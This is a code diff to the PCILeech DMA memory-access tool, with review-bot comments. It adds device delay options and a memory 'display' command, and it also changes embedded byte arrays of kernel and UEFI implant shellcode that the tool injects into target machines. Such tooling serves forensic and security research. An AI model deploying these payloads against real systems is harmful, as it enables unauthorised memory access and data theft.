diff --git a/pcileech/device605_601.c b/pcileech/device605_601.c
index 1732ec6..440c61e 100644
--- a/pcileech/device605_601.c
+++ b/pcileech/device605_601.c
@@ -30,9 +30,9 @@
// Delay in uS. DELAY_READ=300, DELAY_WRITE=150 -> 85MB/s.
// Values below are a bit more conservative for hw tolerance reasons.
-#define DELAY_READ 400
-#define DELAY_WRITE 175
-#define DELAY_PROBE 500
+#define DELAY_READ_DEFAULT 400
+#define DELAY_WRITE_DEFAULT 175
+#define DELAY_PROBE_DEFAULT 500
typedef struct tdDEVICE_CONTEXT_SP605_601 {
WORD wDeviceId;
@@ -84,8 +84,9 @@ typedef struct tdDEVICE_CONTEXT_SP605_601 {
} dev;
BOOL(*hRxTlpCallbackFn)(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMrd, _In_ PBYTE pb, _In_ DWORD cb, _In_opt_ HANDLE hEventCompleted);
- QWORD dbg_qwLastTx[8];
- DWORD dbg_cbLastTx;
+ DWORD DELAY_READ;
+ DWORD DELAY_WRITE;
+ DWORD DELAY_PROBE;
} DEVICE_CONTEXT_SP605_601, *PDEVICE_CONTEXT_SP605_601;
//-------------------------------------------------------------------------------
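Review bot: The three new context members are written in macro case (`DELAY_READ`, `DELAY_WRITE`, `DELAY_PROBE`), which in this file reads as a `#define` rather than a struct field, while the surrounding members follow the Hungarian convention (`wDeviceId`, `hRxTlpCallbackFn`). Consider `DWORD dwDelayRead; DWORD dwDelayWrite; DWORD dwDelayProbe;` and adjusting the uses in the ReadDMA, ProbeDMA and Open hunks of this file. A short comment on the unit would also help, e.g. `// delays in microseconds; 0 is replaced by DELAY_*_DEFAULT at open`.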
@@ -297,13 +298,13 @@ BOOL Device605_601_ReadDMA(_Inout_ PPCILEECH_CONTEXT ctxPcileech, _In_ QWORD qwA
isFlush = ((o % 0x8000) == 0x7000);
if(isFlush) {
Device605_601_TxTlp(ctx, (PBYTE)tx, is32 ? 12 : 16, FALSE, TRUE);
- usleep(DELAY_WRITE);
+ usleep(ctx->DELAY_WRITE);
} else {
Device605_601_TxTlp(ctx, (PBYTE)tx, is32 ? 12 : 16, FALSE, FALSE);
}
}
Device605_601_TxTlp(ctx, NULL, 0, TRUE, TRUE);
- usleep(DELAY_READ);
+ usleep(ctx->DELAY_READ);
Device605_601_RxTlpSynchronous(ctx);
ctx->pMRdBuffer = NULL;
return rxbuf.cb >= rxbuf.cbMax;
@@ -360,7 +361,7 @@ VOID Device605_601_ProbeDMA(_Inout_ PPCILEECH_CONTEXT ctxPcileech, _In_ QWORD qw
Device605_601_TxTlp(ctx, (PBYTE)tx, is32 ? 12 : 16, FALSE, (i % 24 == 0));
}
Device605_601_TxTlp(ctx, NULL, 0, TRUE, TRUE);
- usleep(DELAY_PROBE);
+ usleep(ctx->DELAY_PROBE);
Device605_601_RxTlpSynchronous(ctx);
ctx->hRxTlpCallbackFn = NULL;
ctx->pMRdBuffer = NULL;
@@ -472,6 +473,9 @@ BOOL Device605_601_Open(_Inout_ PPCILEECH_CONTEXT ctxPcileech)
ctx->txbuf.pb = LocalAlloc(0, ctx->txbuf.cbMax);
if(!ctx->txbuf.pb) { goto fail; }
ctx->isPrintTlp = ctxPcileech->cfg->fVerboseExtra;
+ ctx->DELAY_READ = ctxPcileech->cfg->qwDeviceOpt[0] ? (DWORD)ctxPcileech->cfg->qwDeviceOpt[0] : DELAY_READ_DEFAULT;
+ ctx->DELAY_WRITE = ctxPcileech->cfg->qwDeviceOpt[1] ? (DWORD)ctxPcileech->cfg->qwDeviceOpt[1] : DELAY_WRITE_DEFAULT;
+ ctx->DELAY_PROBE = ctxPcileech->cfg->qwDeviceOpt[2] ? (DWORD)ctxPcileech->cfg->qwDeviceOpt[2] : DELAY_PROBE_DEFAULT;
// set callback functions and fix up config
ctxPcileech->cfg->dev.tp = PCILEECH_DEVICE_SP605_FT601;
ctxPcileech->cfg->dev.qwMaxSizeDmaIo = SP605_601_MAX_SIZE_RX;
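Review bot: `ctxPcileech->cfg->qwDeviceOpt[0..2]` is narrowed to DWORD and stored without any range check, and the stored values go straight to `usleep()` in the ReadDMA and ProbeDMA hunks above. A value that does not fit in 32 bits is silently truncated, and POSIX allows usleep() to fail with EINVAL for arguments of 1000000 or more, so an out-of-range option could become a delay that never happens while the return value is ignored. Consider rejecting such values here, e.g. `if((ctx->DELAY_READ >= 1000000) || (ctx->DELAY_WRITE >= 1000000) || (ctx->DELAY_PROBE >= 1000000)) { printf("Device Info: SP605 / FT601 delay option out of range.\n"); goto fail; }`. Device605_601_Open starts before this hunk.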
@@ -484,7 +488,13 @@ BOOL Device605_601_Open(_Inout_ PPCILEECH_CONTEXT ctxPcileech)
ctxPcileech->cfg->dev.pfnWriteTlp = Device605_601_WriteTlp;
ctxPcileech->cfg->dev.pfnListenTlp = Device605_601_ListenTlp;
// return
- if(ctxPcileech->cfg->fVerbose) { printf("Device Info: SP605 / FT601.\n"); }
+ if(ctxPcileech->cfg->fVerbose) {
+ if((ctx->DELAY_READ != DELAY_READ_DEFAULT) || (ctx->DELAY_WRITE != DELAY_WRITE_DEFAULT) || (ctx->DELAY_PROBE != DELAY_PROBE_DEFAULT)) {
+ printf("Device Info: SP605 / FT601 [%i,%i,%i]\n", ctx->DELAY_READ, ctx->DELAY_WRITE, ctx->DELAY_PROBE);
+ } else {
+ printf("Device Info: SP605 / FT601.\n");
+ }
+ }
return TRUE;
fail:
Device605_601_Close(ctxPcileech);
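Review bot: The new verbose printf uses `%i` for `ctx->DELAY_READ`, `ctx->DELAY_WRITE` and `ctx->DELAY_PROBE`, which the struct hunk above declares as `DWORD` (unsigned); `%i` expects a signed int, so the conversion does not match the argument type. Use `printf("Device Info: SP605 / FT601 [%u,%u,%u]\n", ctx->DELAY_READ, ctx->DELAY_WRITE, ctx->DELAY_PROBE);`. The enclosing Device605_601_Open begins outside this hunk.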
diff --git a/pcileech/executor.c b/pcileech/executor.c
index 1d62b95..74f7b41 100644
--- a/pcileech/executor.c
+++ b/pcileech/executor.c
@@ -342,7 +342,7 @@ VOID ActionExecShellcode(_Inout_ PPCILEECH_CONTEXT ctx)
goto fail;
}
// print to screen
- Util_PrintHexAscii(pbBuffer, cbLength);
+ Util_PrintHexAscii(pbBuffer, cbLength, 0);
// write to out file
if(ctx->cfg->szFileOut[0]) {
// open output file
diff --git a/pcileech/extra.c b/pcileech/extra.c
index ac538aa..4f25907 100644
--- a/pcileech/extra.c
+++ b/pcileech/extra.c
@@ -198,6 +198,11 @@ VOID Action_TlpTx(_Inout_ PPCILEECH_CONTEXT ctx)
{
if(ctx->cfg->cbIn < 12) {
printf("Action_TlpTx: Invalid TLP (too short).\n");
+ return;
+ }
+ if(ctx->cfg->cbIn % 4) {
+ printf("Action_TlpTx: Invalid TLP (length not multiple of 4).\n");
+ return;
}
printf("TLP: Transmitting PCIe TLP.%s\n", ctx->cfg->fVerboseExtra ? "" : " (use -vv option for detailed info).");
DeviceWriteTlp(ctx, ctx->cfg->pbIn, (DWORD)ctx->cfg->cbIn);
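Review bot: The two new guards only bound the TLP from below; `ctx->cfg->cbIn` is a QWORD that is narrowed with `(DWORD)` at the DeviceWriteTlp call on the last hunk line, so an oversized `-in` buffer is passed on with a silently truncated length unless DeviceWriteTlp checks it itself. Add a symmetric upper bound next to the new checks, e.g. `if(ctx->cfg->cbIn > MAX_TLP_BYTES_PLACEHOLDER) { printf("Action_TlpTx: Invalid TLP (too long).\n"); return; }`, with the placeholder replaced by the largest TLP the device path accepts. Action_TlpTx continues after this hunk.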
diff --git a/pcileech/help.c b/pcileech/help.c
index 0f3793f..b71446e 100644
--- a/pcileech/help.c
+++ b/pcileech/help.c
@@ -47,6 +47,7 @@ VOID Help_ShowGeneral()
" kmdload DMA [ pt, cr3 ] \n" \
" kmdexit KMD \n" \
" mount KMD [ s ] (Windows only feature) \n" \
+ " display DMA,KMD [ min, max ] \n" \
" pagedisplay DMA,KMD [ min ] \n" \
" pt_phys2virt DMA,KMD [ cr3, 0 ] \n" \
" testmemread DMA [ min ] \n" \
@@ -94,6 +95,9 @@ VOID Help_ShowGeneral()
" Valid options: USB3380, SP605_FT601, SP605_TCP \n" \
" -device-addr: Remote address for -device SP605_TCP. \n" \
" -device-port: Remote TCP port for -device SP605_TCP. Default value: 28472. \n" \
+ " -device-opt[0-3]: Optional additional device configuration for some devices.\n" \
+ " SP605_FT605 device: NB! 0 = default!. -device-opt0 = delay read uS \n" \
+ " -device-opt1 = delay write uS, -device-opt2 = delay probe uS \n" \
" -help: show help about the selected command or implant and then exit \n" \
" without running the command. Affects all modes and commands. \n" \
" Option has no value. Example: -help \n" \
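Review bot: The new help text names the device `SP605_FT605`, while the option list two lines above it (`Valid options: USB3380, SP605_FT601, SP605_TCP`) and the device code in this commit use `SP605_FT601`; it also advertises `-device-opt[0-3]` although only opt0..opt2 are consumed by the SP605/FT601 Open hunk in this commit. Suggest `" -device-opt[0-3]: Optional additional device configuration for some devices.\n" \`, `" SP605_FT601 device (0 = default): -device-opt0 = delay read uS, \n" \` and `" -device-opt1 = delay write uS, -device-opt2 = delay probe uS \n" \`, keeping the column width of the neighbouring lines. Because 0 selects the default, a zero delay cannot be requested through these options; the text should say so if that is intended.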
@@ -140,7 +144,7 @@ VOID Help_ShowInfo()
printf(
" PCILEECH INFORMATION \n" \
" PCILeech (c) 2016, 2017 Ulf Frisk \n" \
- " Version: 2.5 \n" \
+ " Version: 2.5.1 \n" \
" License: GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007 \n" \
" Contact information: pcileech@frizk.net \n" \
" System requirements: 64-bit Windows 7, 10 or Linux. \n" \
diff --git a/pcileech/memdump.c b/pcileech/memdump.c
index 1e299a8..7809c10 100644
--- a/pcileech/memdump.c
+++ b/pcileech/memdump.c
@@ -154,16 +154,37 @@ VOID ActionMemoryProbe(_Inout_ PPCILEECH_CONTEXT ctx)
printf("Memory Probe: Completed.\n");
}
-VOID ActionMemoryPageDisplay(_Inout_ PPCILEECH_CONTEXT ctx)
+VOID ActionMemoryDisplay(_Inout_ PPCILEECH_CONTEXT ctx)
{
- BYTE pb[4096];
- QWORD qwAddr = ctx->cfg->qwAddrMin & 0x0fffffffffffff000;
- if(!DeviceReadMEM(ctx, qwAddr, pb, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
- printf("Memory Page Read: Failed reading memory at address: 0x%016llX.\n", qwAddr);
+ QWORD qwAddrBase, qwAddrOffset, qwSize, qwSize_4kAlign;
+ PBYTE pb;
+ // allocate and calculate values
+ pb = LocalAlloc(0, 0x10000);
+ if(!pb) { return; }
+ qwAddrBase = ctx->cfg->qwAddrMin & 0x0fffffffffffff000;
+ qwAddrOffset = ctx->cfg->qwAddrMin & 0xff0;
+ qwSize_4kAlign = SIZE_PAGE_ALIGN_4K(ctx->cfg->qwAddrMax) - qwAddrBase;
+ qwSize = ((ctx->cfg->qwAddrMax + 0xf) & 0x0fffffffffffffff0) - (qwAddrBase + qwAddrOffset);
+ if(qwSize_4kAlign > 0x10000) {
+ qwSize = 0x100;
+ qwSize_4kAlign = (qwAddrOffset <= 0xf00) ? 0x1000 : 0x2000;
+ }
+ // read memory and display output
+ if(!DeviceReadMEM(ctx, qwAddrBase, pb, (DWORD)qwSize_4kAlign, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
+ printf("Memory Display: Failed reading memory at address: 0x%016llX.\n", qwAddrBase);
+ LocalFree(pb);
return;
}
- printf("Memory Page Read: Page contents for address: 0x%016llX\n", qwAddr);
- Util_PrintHexAscii(pb, 4096);
+ printf("Memory Display: Contents for address: 0x%016llX\n", qwAddrBase);
+ Util_PrintHexAscii(pb, (DWORD)qwSize, (DWORD)qwAddrOffset);
+ LocalFree(pb);
+}
+
+VOID ActionMemoryPageDisplay(_Inout_ PPCILEECH_CONTEXT ctx)
+{
+ ctx->cfg->qwAddrMin = ctx->cfg->qwAddrMin & 0x0fffffffffffff000;
+ ctx->cfg->qwAddrMax = ctx->cfg->qwAddrMin + 0x1000;
+ ActionMemoryDisplay(ctx);
}
VOID ActionMemoryTestReadWrite(_Inout_ PPCILEECH_CONTEXT ctx)
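Review bot: The size arithmetic in ActionMemoryDisplay silently relies on unsigned wraparound when `qwAddrMax` is below `qwAddrMin`: `qwSize = ((qwAddrMax + 0xf) & ...) - (qwAddrBase + qwAddrOffset)` wraps to a huge value whenever the maximum lies inside the base page but below the minimum, the `qwSize_4kAlign > 0x10000` test then does not fire (assuming SIZE_PAGE_ALIGN_4K rounds up), and the wrapped value is narrowed to DWORD and handed to Util_PrintHexAscii, which prints up to 0x10000 bytes although only `qwSize_4kAlign` bytes of the `LocalAlloc(0, 0x10000)` buffer were filled by DeviceReadMEM — the remainder is uninitialized heap. Make the fallback explicit with `if((ctx->cfg->qwAddrMax <= ctx->cfg->qwAddrMin) || (qwSize_4kAlign > 0x10000)) {`. ActionMemoryPageDisplay now also overwrites `ctx->cfg->qwAddrMin`/`qwAddrMax` in place; a comment noting that side effect would help anything that reuses the config afterwards.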
diff --git a/pcileech/memdump.h b/pcileech/memdump.h
index 234a36d..411d9dc 100644
--- a/pcileech/memdump.h
+++ b/pcileech/memdump.h
@@ -47,4 +47,11 @@ VOID ActionMemoryTestReadWrite(_Inout_ PPCILEECH_CONTEXT ctx);
*/
VOID ActionMemoryPageDisplay(_Inout_ PPCILEECH_CONTEXT ctx);
+/*
+* Print out a maximum of 16kB (0x10000) memory limited by the min and max
+* parameters in pCfg. By default 0x100 bytes are displayed.
+* -- ctx
+*/
+VOID ActionMemoryDisplay(_Inout_ PPCILEECH_CONTEXT ctx);
+
#endif /* __MEMDUMP_H__ */
\ No newline at end of file
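Review bot: The new comment says `a maximum of 16kB (0x10000)`, but 0x10000 is 65536 bytes (64 KiB), which is also the size of the `LocalAlloc(0, 0x10000)` buffer and the `> 0x10000` cut-off in the memdump.c hunk. Suggest `* Print out a maximum of 64kB (0x10000 bytes) of memory limited by the min and max`. It would also help to state that the displayed start address is min rounded down to 16 bytes and that an invalid or oversized range falls back to the 0x100-byte default.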
diff --git a/pcileech/pcileech.c b/pcileech/pcileech.c
index 06a0c44..772da8a 100644
--- a/pcileech/pcileech.c
+++ b/pcileech/pcileech.c
@@ -33,6 +33,7 @@ BOOL PCILeechConfigIntialize(_In_ DWORD argc, _In_ char* argv[], _Inout_ PPCILEE
{.tp = MOUNT,.sz = "mount" },
{.tp = USB3380_START8051,.sz = "8051start" },
{.tp = USB3380_STOP8051,.sz = "8051stop" },
+ {.tp = DISPLAY,.sz = "display" },
{.tp = PAGEDISPLAY,.sz = "pagedisplay" },
{.tp = TESTMEMREAD,.sz = "testmemread" },
{.tp = TESTMEMREADWRITE,.sz = "testmemreadwrite" },
@@ -151,7 +152,9 @@ BOOL PCILeechConfigIntialize(_In_ DWORD argc, _In_ char* argv[], _Inout_ PPCILEE
}
} else if(2 == strlen(argv[i]) && '0' <= argv[i][1] && '9' >= argv[i][1]) { // -0..9 param
ctx->cfg->qwDataIn[argv[i][1] - '0'] = Util_GetNumeric(argv[i + 1]);
- }
+ } else if(!memcmp(argv[i], "-device-opt", 11) && (argv[i][11] >= '0') && (argv[i][11] <= '3')) { // -devopt[0-3] (device options)
+ ctx->cfg->qwDeviceOpt[argv[i][11] - '0'] = Util_GetNumeric(argv[i + 1]);
+ }
i += 2;
}
if(!ctx->cfg->pbIn) {
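Review bot: `memcmp(argv[i], "-device-opt", 11)` reads 11 bytes of `argv[i]` unconditionally, so any shorter argument (for example `-vv` or `-in`) is read past its NUL terminator; use a length-aware string compare: `} else if(!strncmp(argv[i], "-device-opt", 11) && (argv[i][11] >= '0') && (argv[i][11] <= '3')) { // -device-opt[0-3] (device options)`. The trailing comment also says `-devopt[0-3]`, which is not the spelling the code matches. The `argv[i + 1]` access presumably relies on an argc check in the loop header outside this hunk; PCILeechConfigIntialize starts before the hunk.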
@@ -208,6 +211,14 @@ int main(_In_ int argc, _In_ char* argv[])
printf("PCILEECH: Out of memory.\n");
return 1;
}
+ //LPSTR szTMP[] = { "", "-device", "SP605_TCP", "-device-addr", "192.168.1.2", "dump", "-out", "none", "-min", "0x100000000", "-max", "0x110010000" };
+ //LPSTR szTMP[] = { "", "kmdload", "-kmd", "win10x64_ntfs_20170919_14240.kmd", "-min", "0x100000000" };
+ //LPSTR szTMP[] = { "", "mount", "-kmd", "win10_x64"};
+ //LPSTR szTMP[] = { "", "write", "-min", "0xc6010000", "-in", "c:\\temp\\16M_zero.raw"};
+ //LPSTR szTMP[] = { "", "pagedisplay", "-min", "0x1000", "-vv"};
+ ///LPSTR szTMP[] = { "", "dump", "-out", "none", "-min", "0x100000000", "-max", "0x120000000"};
+ //LPSTR szTMP[] = { "", "tlp", "-in", "00000000c30000ffc1000000", "-vv"};
+ //result = PCILeechConfigIntialize(sizeof(szTMP) / sizeof(LPSTR), szTMP, ctx);
result = PCILeechConfigIntialize((DWORD)argc, argv, ctx);
if(!result) {
Help_ShowGeneral();
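Review bot: The eight new lines in main are commented-out debugging scaffolding (`//LPSTR szTMP[] = ...`, `//result = PCILeechConfigIntialize(...)`) that hard-code local paths, addresses and a kmd file name; they add nothing to the shipped build and will drift from the real argument parser over time. Remove them, or move the cases into a test harness outside main. main continues on both sides of this hunk.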
@@ -257,6 +268,8 @@ int main(_In_ int argc, _In_ char* argv[])
ActionMemoryDump(ctx);
} else if(ctx->cfg->tpAction == WRITE) {
ActionMemoryWrite(ctx);
+ } else if(ctx->cfg->tpAction == DISPLAY) {
+ ActionMemoryDisplay(ctx);
} else if(ctx->cfg->tpAction == PAGEDISPLAY) {
ActionMemoryPageDisplay(ctx);
} else if(ctx->cfg->tpAction == PATCH) {
diff --git a/pcileech/pcileech.h b/pcileech/pcileech.h
index 9769433..14d0dae 100644
--- a/pcileech/pcileech.h
+++ b/pcileech/pcileech.h
@@ -29,6 +29,7 @@ typedef enum tdActionType {
USB3380_FLASH,
USB3380_START8051,
USB3380_STOP8051,
+ DISPLAY,
PAGEDISPLAY,
TESTMEMREAD,
TESTMEMREADWRITE,
@@ -75,6 +76,7 @@ typedef struct tdConfig {
QWORD cbIn;
CHAR szInS[MAX_PATH];
QWORD qwDataIn[10];
+ QWORD qwDeviceOpt[4];
ACTION_TYPE tpAction;
CHAR szSignatureName[MAX_PATH];
CHAR szKMDName[MAX_PATH];
@@ -163,7 +165,7 @@ typedef struct tdKmdExec {
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
@@ -177,8 +179,8 @@ typedef struct tdKMDDATA {
QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
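Review bot: The KMDDATA layout change keeps the documented offsets consistent (`ReservedKMD[8]` spans 0x058–0x097 and `ReservedFutureUse1[13]` spans 0x098–0x0ff, so `dataInExtraLength` stays at 0x100), but nothing enforces it, and this struct is shared with the kernel-side shellcode where an off-by-one element count would shift every later field. If the toolchain accepts C11, add a compile-time check after the typedef, e.g. `_Static_assert(offsetof(KMDDATA, dataInExtraLength) == 0x100, "KMDDATA layout");` (needs `<stddef.h>`; the typedef name is inferred from `PKMDDATA` elsewhere in the diff — confirm). The same layout edit appears in the fbsdx64_common.h, fbsdx64_stage3_c.c and lx64_common.h hunks and would benefit from the same check; the struct continues beyond this hunk.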
diff --git a/pcileech/shellcode.h b/pcileech/shellcode.h
index b8884cc..9f9e889 100644
--- a/pcileech/shellcode.h
+++ b/pcileech/shellcode.h
@@ -939,12 +939,12 @@ const BYTE UEFI_X64_BIN[] = {
0x48, 0x89, 0x5c, 0x24, 0x10, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x57, 0x48,
0x83, 0xec, 0x20, 0x48, 0x8b, 0xda, 0x45, 0x33, 0xc0, 0xba, 0x00, 0x10,
0x00, 0x00, 0x48, 0x8b, 0xf9, 0xe8, 0x59, 0xfe, 0xff, 0xff, 0xba, 0x04,
- 0x00, 0x00, 0x00, 0x48, 0x89, 0x5f, 0x58, 0x48, 0xb8, 0x77, 0x33, 0x33,
- 0x11, 0x77, 0x33, 0x11, 0xff, 0x48, 0xc7, 0x47, 0x50, 0x10, 0x00, 0x00,
- 0x00, 0xbd, 0xff, 0xff, 0xff, 0xff, 0x48, 0x89, 0x07, 0x4c, 0x8d, 0x4c,
- 0x24, 0x30, 0x48, 0x89, 0x6c, 0x24, 0x30, 0x8d, 0x5a, 0xfd, 0x48, 0xc7,
- 0x47, 0x18, 0x00, 0x00, 0x00, 0x01, 0x8b, 0xcb, 0x41, 0xb8, 0x00, 0x10,
- 0x00, 0x00, 0xe8, 0x2f, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x31,
+ 0x00, 0x00, 0x00, 0x48, 0xc7, 0x47, 0x50, 0x10, 0x00, 0x00, 0x00, 0x48,
+ 0xb8, 0x77, 0x33, 0x33, 0x11, 0x77, 0x33, 0x11, 0xff, 0x4c, 0x8d, 0x4c,
+ 0x24, 0x30, 0x48, 0x89, 0x07, 0xbd, 0xff, 0xff, 0xff, 0xff, 0x48, 0x89,
+ 0x5f, 0x58, 0x41, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x8d, 0x5a, 0xfd, 0x48,
+ 0x89, 0x6c, 0x24, 0x30, 0x8b, 0xcb, 0x48, 0xc7, 0x47, 0x18, 0x00, 0x00,
+ 0x00, 0x01, 0xe8, 0x2f, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x31,
0x4c, 0x8d, 0x4c, 0x24, 0x30, 0x48, 0x89, 0x6c, 0x24, 0x30, 0x8d, 0x53,
0x03, 0x48, 0xc7, 0x47, 0x18, 0x00, 0x00, 0x40, 0x00, 0x41, 0xb8, 0x00,
0x04, 0x00, 0x00, 0x8b, 0xcb, 0xe8, 0x08, 0xfe, 0xff, 0xff, 0x48, 0x85,
@@ -977,11 +977,11 @@ const BYTE UEFI_X64_BIN[] = {
const BYTE WINX64_VFS_KSH[] = {
- 0x37, 0x13, 0xec, 0x3c, 0x72, 0x06, 0xae, 0x99, 0x7a, 0x09, 0xe0, 0x83,
- 0x60, 0xa6, 0x94, 0x62, 0xb6, 0x64, 0x74, 0xfb, 0x90, 0x49, 0xd7, 0x36,
- 0xc7, 0xfe, 0x97, 0xc0, 0x26, 0xe0, 0x4c, 0xac, 0xb3, 0xa5, 0x41, 0x65,
- 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x0a, 0x00, 0x00,
- 0x00, 0x00, 0x00, 0x00, 0x9a, 0x1a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x37, 0x13, 0xec, 0x3c, 0xfd, 0xf7, 0x30, 0x9f, 0x78, 0x47, 0xc0, 0x51,
+ 0x0e, 0x3b, 0xb5, 0x58, 0x72, 0xa5, 0xe9, 0x42, 0x30, 0x50, 0xe4, 0x5e,
+ 0xdf, 0x7b, 0x18, 0x97, 0x75, 0x04, 0xfa, 0x02, 0xf2, 0x66, 0x21, 0x13,
+ 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd7, 0x09, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x72, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
@@ -1096,7 +1096,7 @@ const BYTE WINX64_VFS_KSH[] = {
0xc0, 0x48, 0x89, 0x44, 0x24, 0x38, 0x33, 0xd2, 0x41, 0x8b, 0x86, 0x30,
0x03, 0x00, 0x00, 0x89, 0x44, 0x24, 0x30, 0x48, 0x8d, 0x45, 0xf7, 0x48,
0x89, 0x4c, 0x24, 0x28, 0x48, 0x8b, 0x4d, 0x6f, 0x48, 0x89, 0x44, 0x24,
- 0x20, 0xff, 0x97, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0xd8, 0x85, 0xc0, 0x75,
+ 0x20, 0xff, 0x97, 0xb8, 0x00, 0x00, 0x00, 0x8b, 0xd8, 0x85, 0xc0, 0x75,
0x0b, 0x48, 0x8b, 0x45, 0xff, 0x48, 0x89, 0x86, 0x00, 0x02, 0x00, 0x00,
0x48, 0x8b, 0x4d, 0x6f, 0x48, 0x85, 0xc9, 0x74, 0x06, 0xff, 0x97, 0x88,
0x00, 0x00, 0x00, 0x4c, 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x8b,
@@ -1148,70 +1148,45 @@ const BYTE WINX64_VFS_KSH[] = {
0xcb, 0xe8, 0x7e, 0xf9, 0xff, 0xff, 0xeb, 0xa0, 0xb8, 0x01, 0x00, 0x00,
0xc0, 0x48, 0x89, 0x83, 0x20, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xf0,
0x00, 0x00, 0x00, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48,
- 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x55,
- 0x48, 0x8d, 0xa8, 0x38, 0xff, 0xff, 0xff, 0x48, 0x81, 0xec, 0xc0, 0x01,
- 0x00, 0x00, 0xb8, 0x4a, 0x45, 0x3b, 0xd7, 0x48, 0x89, 0x54, 0x24, 0x20,
- 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8b, 0xf1, 0x48, 0x8d, 0x42, 0x08,
- 0x48, 0xc7, 0x44, 0x24, 0x38, 0x62, 0xe0, 0x07, 0x37, 0x48, 0x89, 0x44,
- 0x24, 0x30, 0xb9, 0x2a, 0xd0, 0x35, 0x30, 0x48, 0x8d, 0x42, 0x10, 0x48,
- 0xc7, 0x44, 0x24, 0x68, 0x92, 0x6d, 0x58, 0x58, 0x48, 0x89, 0x44, 0x24,
- 0x40, 0xb8, 0x1f, 0x9d, 0x48, 0x9d, 0x48, 0x89, 0x44, 0x24, 0x48, 0x48,
- 0x8d, 0x42, 0x18, 0x48, 0x89, 0x44, 0x24, 0x50, 0xb8, 0xa1, 0x7b, 0xcc,
- 0xdc, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x42, 0x20, 0x48, 0x89,
- 0x44, 0x24, 0x60, 0x48, 0x8d, 0x42, 0x28, 0x48, 0x89, 0x44, 0x24, 0x70,
- 0x48, 0x8d, 0x42, 0x30, 0x48, 0x89, 0x45, 0x80, 0x48, 0x8d, 0x42, 0x38,
- 0x48, 0x89, 0x45, 0x90, 0x48, 0x8d, 0x42, 0x40, 0x48, 0x89, 0x45, 0xa0,
- 0x48, 0x8d, 0x42, 0x48, 0x48, 0x89, 0x45, 0xb0, 0xb8, 0xf7, 0x38, 0xb3,
- 0x9d, 0x48, 0x89, 0x45, 0xb8, 0x48, 0x8d, 0x42, 0x50, 0x48, 0x89, 0x45,
- 0xc0, 0x48, 0x8d, 0x42, 0x58, 0x48, 0x89, 0x45, 0xd0, 0xb8, 0x89, 0x83,
- 0x6c, 0xeb, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8d, 0x42, 0x60, 0x48, 0x89,
- 0x45, 0xe0, 0xb8, 0x9b, 0x97, 0x64, 0xcf, 0x48, 0x89, 0x45, 0xe8, 0x48,
- 0x8d, 0x42, 0x68, 0x48, 0x89, 0x45, 0xf0, 0xb8, 0x2a, 0xc0, 0xb2, 0xa8,
- 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8d, 0x42, 0x70, 0x48, 0x89, 0x45, 0x00,
- 0x48, 0x8d, 0x42, 0x78, 0x48, 0x89, 0x45, 0x10, 0x48, 0x89, 0x45, 0x20,
- 0x48, 0x8d, 0x82, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0x30, 0xb8,
- 0xdb, 0x4f, 0x3d, 0xc5, 0x48, 0x89, 0x45, 0x38, 0x48, 0x8d, 0x82, 0x88,
- 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0x40, 0x48, 0x8d, 0x82, 0x90, 0x00,
- 0x00, 0x00, 0x48, 0x89, 0x45, 0x50, 0xb8, 0x9d, 0x8f, 0xa0, 0xc3, 0x48,
- 0x89, 0x45, 0x58, 0x48, 0x8d, 0x82, 0x98, 0x00, 0x00, 0x00, 0x48, 0x89,
- 0x45, 0x60, 0xb8, 0xb8, 0xd4, 0x29, 0x88, 0x48, 0x89, 0x45, 0x68, 0x48,
- 0x8d, 0x82, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0x70, 0xb8, 0x16,
- 0x35, 0xfd, 0x87, 0x48, 0x89, 0x45, 0x78, 0x48, 0x8d, 0x82, 0xa0, 0x00,
